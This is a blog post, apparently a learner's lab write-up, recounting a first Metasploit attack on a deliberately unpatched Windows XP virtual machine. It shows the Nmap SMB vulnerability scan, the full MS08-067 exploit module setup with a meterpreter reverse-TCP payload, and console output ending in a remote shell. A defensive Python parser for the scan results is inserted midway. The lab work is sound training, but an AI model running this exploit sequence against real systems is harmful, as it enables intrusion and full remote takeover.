Channel: Pax Pentest » Metasploit

My First Metasploit Exploit

I shall attempt my first exploit and target the Windows portion of my Virtual Hacking Lab. I’m following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up is to scan the ports with Nmap from within Metasploit:

nmap -sT -A --script=smb-check-vulns --script-args=unsafe=1 -P0 192.168.1.79

I have run an Nmap scan against this host before with different switches; this time, however, the results include:

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
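When the same scan is run across a whole subnet, the host-script block above is what has to be triaged. The following is an added example, not code from the original post, that parses Nmap's `smb-check-vulns` output into per-host results and lists the checks reported as VULNERABLE for patching; the sample text is constructed from the format shown above, with a second, clean host (192.168.1.80) added purely to exercise the grouping.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the smb-check-vulns host-script format printed by Nmap.
# 192.168.1.79 mirrors the scan above; 192.168.1.80 is an invented clean host.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.79
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Nmap scan report for 192.168.1.80
Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|_  Conficker: Likely CLEAN
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# "|" or "|_" prefix, the check name, then one of the statuses the script emits.
CHECK_RE = re.compile(
    r"^\|_?\s+(.+?):\s+(VULNERABLE|NOT VULNERABLE|Likely CLEAN|NO SERVICE)")


def parse_smb_check_vulns(text: str) -> Dict[str, Dict[str, str]]:
    """Return {host: {check_name: status}} for every smb-check-vulns block."""
    results: Dict[str, Dict[str, str]] = {}
    host = None
    in_block = False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)       # a new host report resets block state
            in_block = False
            continue
        if host and line.startswith("| smb-check-vulns:"):
            in_block = True
            results.setdefault(host, {})
            continue
        if in_block:
            m = CHECK_RE.match(line)
            if not m:
                in_block = False    # blank line or next script: block is over
                continue
            results[host][m.group(1)] = m.group(2)
    return results


def vulnerable_findings(text: str) -> List[Tuple[str, str]]:
    """(host, check) pairs whose status is exactly VULNERABLE, for ticketing."""
    return [(h, c) for h, checks in parse_smb_check_vulns(text).items()
            for c, s in checks.items() if s == "VULNERABLE"]
```

Running `vulnerable_findings(SAMPLE_NMAP_OUTPUT)` on the sample yields only `("192.168.1.79", "MS08-067")`; statuses such as NO SERVICE are kept in the parsed dictionary but are not raised as findings.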

Obviously ‘MS08-067: VULNERABLE’ is the pertinent result, so on to the exploit.

I searched Metasploit for the vulnerability:

msf > search MS08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

So, to the attack:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp (This has the target machine connect to the attacking machine)

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)

...SNIP...

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3 (I know the operating system details from the Nmap scan)
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79 (Target machine)
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70 (Attacking Machine)
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080 (Attacking machine’s listening port)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080

[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:8080 -> 192.168.1.79:1036) at 2013-06-02 10:06:42 +0100

meterpreter > shell
Process 2236 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And there it is, in all its glory, an interactive command shell. I now have complete control over the target machine.

Obviously the Virtual Hacking Lab target is deliberately configured to be vulnerable, and the operating system is old and unpatched with no firewall; still, I really enjoyed testing out Metasploit for the first time and getting the desired result.
